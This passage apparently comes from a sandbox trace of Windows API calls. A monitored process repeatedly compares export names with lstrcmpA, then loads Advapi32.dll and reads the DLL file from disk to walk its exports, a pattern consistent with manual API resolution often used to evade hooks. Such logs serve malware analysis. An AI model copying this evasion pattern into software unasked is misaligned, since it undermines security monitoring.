lpString2="AppCacheCheckManifest") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0211.892] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0211.892] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0211.893] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.893] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0211.894] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.894] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0211.895] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.895] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0211.896] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0211.897] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0211.898] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0211.898] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0211.899] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0211.899] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0211.899] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0211.899] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.899] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0211.899] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.899] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0211.900] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0211.901] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0211.902] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0211.902] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0211.903] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0212.413] GetProcessHeap () returned 0x560000 [0212.415] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x4173040 | out: hHeap=0x560000) returned 1 [0212.436] GetProcessHeap () returned 0x560000 [0212.436] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x5792d0 [0212.436] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0212.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0212.437] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0212.438] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0212.438] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0212.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0212.438] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0212.438] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0212.438] GetProcessHeap () returned 0x560000 [0212.438] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa3ef0) returned 0x2db2010 [0212.779] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0212.779] ReadFile (in: hFile=0x140, lpBuffer=0x2db2010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db2010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0212.801] CloseHandle (hObject=0x140) returned 1 [0212.801] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0212.801] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0212.801] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0212.801] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0212.801] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0212.802] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0212.802] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0212.802] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0212.802] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0212.802] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0212.802] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0212.802] 